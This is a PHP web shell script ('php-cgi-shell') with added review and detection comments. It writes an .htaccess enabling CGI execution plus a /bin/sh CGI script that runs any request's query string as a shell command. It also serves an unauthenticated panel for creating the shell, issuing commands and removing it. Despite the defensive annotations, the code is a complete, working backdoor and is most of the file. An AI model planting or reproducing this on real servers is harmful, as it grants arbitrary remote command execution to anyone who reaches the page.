shell.php
<?php
// php-cgi-shell
// - jgor <[email protected]>
// Hard-coded names of the artefacts this script creates and later removes.
// They are relative paths, so they resolve against the PHP working directory.
// The extension of $shell ("hax") is extracted further down and becomes the
// extension mapped to the CGI handler in the generated .htaccess.
// Because nothing here is randomised, "shell/.htaccess" and "shell/shell.hax"
// are stable names to look for with file-integrity monitoring.
$dir = 'shell';
$shell = 'shell.hax';
/**
 * Create the directory that will hold the generated .htaccess and CGI script.
 *
 * Prints progress as HTML and ends the whole request through die() when
 * mkdir() fails (for example because the directory already exists or the
 * parent directory is not writable by the PHP process).
 *
 * @param string $folder Path of the directory to create.
 */
function create_directory($folder) {
echo "Creating directory... ";
// NOTE(review): 0777 asks for a world-writable directory; the effective mode
// is still reduced by the process umask. Everything this file does afterwards
// depends on the PHP user being able to create a directory under the document
// root, so a document root that is not writable by that user stops it here.
mkdir($folder, 0777) or die('failed<br />');
echo "done<br />";
}
/**
 * Write a per-directory Apache override file that switches on CGI execution.
 *
 * The generated file holds exactly two directives, "Options +ExecCGI" and
 * "AddHandler cgi-script .<ext>". With them in force, the web server runs any
 * file with that extension in the directory as a CGI program instead of
 * serving it as content. Execution therefore happens in the web server's CGI
 * layer, not in PHP, so PHP-level restrictions on process-spawning functions
 * do not apply to it.
 *
 * Defensive notes: the directives only take effect where the server honours
 * .htaccess overrides for Options and FileInfo. "AllowOverride None" on any
 * directory the application can write to, or not loading the CGI modules at
 * all, makes this file inert. A new or modified .htaccess containing ExecCGI
 * or "AddHandler cgi-script" is a high-signal file-integrity alert.
 *
 * @param string $file Path of the .htaccess file to write.
 * @param string $ext  File extension (without the dot) to map to cgi-script.
 */
function create_htaccess($file, $ext) {
echo "Creating htaccess... ";
// Mode 'w' truncates an existing file; a failed open ends the request.
$handle = fopen($file, 'w') or die('failed<br />');
// $ext is interpolated into the heredoc, so the handler is bound to whatever
// extension the caller passes in.
$data = <<<EOT
Options +ExecCGI
AddHandler cgi-script .$ext
EOT;
// The results of fwrite() and fclose() are not checked, so "done" is printed
// even when the write was short or failed.
fwrite($handle, $data);
fclose($handle);
echo "done<br />";
}
/**
 * Write the CGI script to disk and mark it executable.
 *
 * The script is a /bin/sh program that prints a text/plain header and then
 * passes the request's raw QUERY_STRING to "sh -c", with stderr merged into
 * stdout. It contains no authentication and no allow-list. Once the file
 * exists, any client that can request its URL runs commands with the
 * privileges of the CGI process, and the PHP page is no longer involved.
 *
 * Defensive notes: indicators are a file under the document root that starts
 * with "#!/bin/sh", has mode 0755 and an unusual extension, and a web server
 * process that spawns /bin/sh. Removing the file (and the accompanying
 * .htaccess) is what closes the exposure; deleting only the PHP page does not.
 *
 * @param string $file Path of the CGI script to write.
 */
function create_shell($file) {
echo "Creating shell... ";
// Mode 'w' truncates an existing file; a failed open ends the request.
$handle = fopen($file, 'w') or die('failed<br />');
// The backslash before $QUERY_STRING stops PHP from interpolating it, so the
// variable name is written literally and is expanded by the shell at run time.
$data = <<<EOT
#!/bin/sh
echo "Content-type: text/plain"
echo ""
/bin/sh -c "\$QUERY_STRING 2>&1"
EOT;
// The results of fwrite() and fclose() are not checked.
fwrite($handle, $data);
fclose($handle);
echo "done<br />";
echo "Making shell executable... ";
// 0755: owner may write, everyone may read and execute.
chmod($file, 0755) or die('failed<br />');
echo "done<br />";
}
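/**
 * Delete the CGI script if it is present, and report the real outcome.
 *
 * Prints progress as HTML. The result of unlink() is checked so that a
 * deletion that did not happen is reported as "failed" rather than "done":
 * a script that stays on disk remains reachable over HTTP, so cleanup must
 * never be reported as complete when it is not.
 *
 * @param string $shell Path of the CGI script to delete.
 */
function remove_shell($shell) {
    if (file_exists($shell)) {
        echo "Deleting shell... ";
        // unlink() returns false (and raises a warning) on permission
        // problems or when the path is not a regular file.
        echo unlink($shell) ? "done<br />" : "failed<br />";
    }
}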
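/**
 * Delete the generated .htaccess if it is present, and report the real outcome.
 *
 * Prints progress as HTML. The result of unlink() is checked so that a
 * deletion that did not happen is reported as "failed" rather than "done":
 * while the override file stays in place, the directory keeps CGI execution
 * enabled for the mapped extension.
 *
 * @param string $htaccess Path of the .htaccess file to delete.
 */
function remove_htaccess($htaccess) {
    if (file_exists($htaccess)) {
        echo "Deleting htaccess... ";
        // unlink() returns false (and raises a warning) on permission
        // problems or when the path is not a regular file.
        echo unlink($htaccess) ? "done<br />" : "failed<br />";
    }
}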
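/**
 * Remove the artefact directory if it exists, and report the real outcome.
 *
 * Prints progress as HTML. rmdir() only succeeds on an empty directory, so
 * it fails whenever an earlier file deletion did not happen or something
 * else was written into the directory. That case is reported as "failed"
 * instead of "done", so leftover files are not mistaken for a finished
 * cleanup.
 *
 * @param string $dir Path of the directory to remove.
 */
function remove_directory($dir) {
    if (is_dir($dir)) {
        echo "Deleting folder... ";
        // rmdir() returns false (and raises a warning) when the directory
        // is not empty or cannot be removed.
        echo rmdir($dir) ? "done<br />" : "failed<br />";
    }
}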
/**
 * Print the HTML control panel for the current state.
 *
 * When the CGI script exists, the panel links to it and offers a "remove"
 * form and a command form. Otherwise it offers only a "create" form. All
 * forms post back to the current URL (empty action) and carry no anti-CSRF
 * token or other proof of who submitted them.
 *
 * @param string $shell Path of the CGI script, also used as the link target.
 */
function display_shell($shell) {
    if (!file_exists($shell)) {
        // Nothing deployed yet: offer creation only.
        $markup = array(
            '<p>no shell found.</p>',
            '<form action="" method="post">',
            '<input type="hidden" name="create" value="1" />',
            '<input type="submit" value="create shell" />',
            '</form>',
        );
        echo implode('', $markup);
        return;
    }

    // Script present: link to it, then the removal form, then the command form.
    $markup = array(
        '<p>shell at [<a href="' . $shell . '">' . $shell . '</a>]</p>',
        '<form action="" method="post">',
        '<input type="hidden" name="remove" value="1" />',
        '<input type="submit" value="remove shell" />',
        '</form>',
        '<form action="" method="post">',
        'command: <input autofocus type="text" name="cmd" />',
        '<input type="submit" value="exec" /></form>',
    );
    echo implode('', $markup);
}
/**
 * Send one command to the CGI script over HTTP and print the response.
 *
 * Builds an http:// URL for the script from the request's Host header and
 * the directory part of PHP_SELF, appends the command as the query string,
 * fetches that URL with file_get_contents(), and echoes the HTML-escaped
 * response inside a textarea.
 *
 * @param string $shell Path of the CGI script, relative to this page's URL directory.
 * @param string $cmd   Command text taken from the request.
 */
function execute_command($shell, $cmd) {
$path = dirname($_SERVER['PHP_SELF']);
// NOTE(review): HTTP_HOST comes from the client's Host header, so the host the
// server fetches from is chosen by whoever sends the request. The scheme is
// fixed to plain http.
$shell_url = "http://$_SERVER[HTTP_HOST]$path/$shell";
// Spaces are replaced with the literal text ${IFS}; presumably this keeps the
// query string free of raw spaces while the shell run by the script expands
// it back to whitespace. Access-log entries whose query string contains
// "${IFS}" are therefore a usable detection indicator.
$cmd = str_replace(' ', '${IFS}', $cmd);
// An HTTP fetch through file_get_contents() only works when allow_url_fopen
// is enabled. The return value (false on failure) is not checked.
$response = file_get_contents($shell_url . '?' . $cmd);
// Escaping keeps command output from being interpreted as markup in the page.
$output = htmlspecialchars($response);
echo "Output:<br /><textarea rows=25 cols=80>$output</textarea>";
}
// Build the artefact paths from the names set at the top of the file, and take
// the script's extension so the .htaccess handler mapping matches it.
$htaccess = "$dir/.htaccess";
$shell = "$dir/$shell";
$ext = pathinfo($shell, PATHINFO_EXTENSION);
// Request dispatch.
// NOTE(review): every action below is keyed on $_REQUEST, so it can be
// triggered by query-string or form parameters (and by cookies, depending on
// the request_order setting). This file performs no authentication, session
// check or CSRF validation, so anyone who can reach the page can create the
// script, run commands through it, or remove it. Requests to this page that
// carry "create", "remove" or "cmd" parameters are the matching log indicator.
//
// Removal runs first: script, then .htaccess, then the directory.
if (isset($_REQUEST['remove'])) {
remove_shell($shell);
remove_htaccess($htaccess);
remove_directory($dir);
}
// Creation: directory, then the CGI-enabling .htaccess, then the script itself.
if (isset($_REQUEST['create'])) {
create_directory($dir);
create_htaccess($htaccess, $ext);
create_shell($shell);
}
// The panel is always rendered and reflects the state after the actions above.
display_shell($shell);
// The command text is passed on unchanged from the request.
if (isset($_REQUEST['cmd'])) {
$cmd = $_REQUEST['cmd'];
execute_command($shell, $cmd);
}
?>